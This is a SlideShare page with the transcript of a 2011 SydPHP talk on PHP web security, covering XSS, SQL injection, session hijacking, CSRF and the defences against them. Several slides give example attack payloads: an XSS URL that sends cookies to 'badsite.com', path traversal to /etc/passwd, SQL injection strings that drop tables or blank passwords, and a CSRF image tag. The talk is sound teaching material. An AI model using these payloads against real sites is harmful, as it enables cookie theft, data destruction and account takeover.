Your SlideShare is downloading. ×
  • Like
SydPHP Security in PHP
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Now you can save presentations on your phone or tablet

Available for both IPhone and Android

Text the download link to your phone

Standard text messaging rates apply

SydPHP Security in PHP

  • 907 views
Published

Security in PHP talk for SydPHP, Thursday 24th February, 2011

Security in PHP talk for SydPHP, Thursday 24th February, 2011

Published in Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
907
On SlideShare
0
From Embeds
0
Number of Embeds
1

Actions

Shares
Downloads
10
Comments
0
Likes
1

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Security and PHP
    February 2011
  • 2. Allan Shone
    Technical Yahoo!, Local Paranoid @Yahoo!7
    Been at Yahoo!7 just under 3 years
    allan.shone@yahoo.com
  • 3. Website Security
    February 2011
  • 4. What is Security?
    Why is Security important?
    What can you do about it?
  • 5. Types of issues
    XSS
    SQL Injection
    Session Hijacking
    CSRF
    Phishing
  • 6. Why XSS?
    February 2011
  • 7. Lead to larger problems
    Used to inject code into your site
    Bad people ™ can steal user information
  • 8. http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E
    http://sydphp.leetbix.com/template.php?load=%3Cscript%3Edocument.location=%27http://badsite.com%27%3C/script%3E
    http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ea%3Ddocument.createElement(%22img%22)%3Ba.src%3D%22http%3A%2F%2Fbadsite.com%2F%3F%22%2Bdocument.cookie%3Bdocument.firstChild.appendChild(a)%3B%3C%2Fscript%3E
    February 2011
  • 9. February 2011
  • 10. http://sydphp.leetbix.com/template.php?load=/etc/passwd%00
    http://sydphp.leetbix.com/template.php?load=../some-config.conf%00
    February 2011
  • 11. POST too
    February 2011
  • 12. What do I do?!
    February 2011
  • 13. Filter
    Simplest solution: htmlentities()
    February 2011
  • 14. SQL what?
    February 2011
  • 15. Arbitrary SQL code being executed
    Bypass login, edit database content
    Find passwords, hidden information
  • 16. http://sydphp.leetbix.com/login.php
    Password: ‘ OR 1=1 -- ‘
    ‘ OR 1=1; DROP TABLE users; -- ‘
    ‘ OR 1=1; UPDATE TABLE users SET password=‘’ WHERE 1=1; -- ‘
    February 2011
  • 17. Oh no!
    February 2011
  • 18. http://xkcd.com/327/
    February 2011
  • 19. escape
    February 2011
  • 20. mysql_real_escape_string()
    addslashes()
    PDO
    PDO::quote()
  • 21. Session hijacking
    February 2011
  • 22. Bad for users
    Bad for data integrity
    Easy to prevent
  • 23. Not stand-alone
    February 2011
  • 24. Cookies
    February 2011
  • 25. Integrity checking
    February 2011
  • 26. CSRF? Sugar?
    February 2011
  • 27. Cross-site request forgery
    February 2011
  • 28. Simple, but un-common
    February 2011
  • 29. <imgsrc=“http://othersite.com/changepasswd?new=onlyIKnow” />
    <script>
    a=document.createElement(‘img’);a.src=‘http://badsite../’;document.firstChild.appendChild(a);
    a.src=‘http://badsite.com/otherpage’;
    </script>
    February 2011
  • 30. Integrity, integrity
    February 2011
  • 31. Phishing!
    February 2011
  • 32. Same, but different?
    February 2011
  • 33. But what can you do
    February 2011
  • 34. PHP’s filter functions
    February 2011
  • 35. filter_has_var
    filter_id
    filter_input_array
    filter_input
    filter_list
    filter_var_array
    filter_var
  • 36. No more SuperGlobals
    February 2011
  • 37. $search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
    echo ”<h3>No results found for ‘{$search}’.</h3>";
    echo "<a href='?search=$search&page=2'>Next page</a>";
    February 2011
  • 38. INPUT_GET
    INPUT_POST
    INPUT_COOKIE
    INPUT_SERVER
    INPUT_ENV
    February 2011
  • 39. Twitter
    Allan Shone - @cerealboy
    Jared Mooring - @jadzor
    Filter function filters: http://au2.php.net/manual/en/filter.filters.php
    February 2011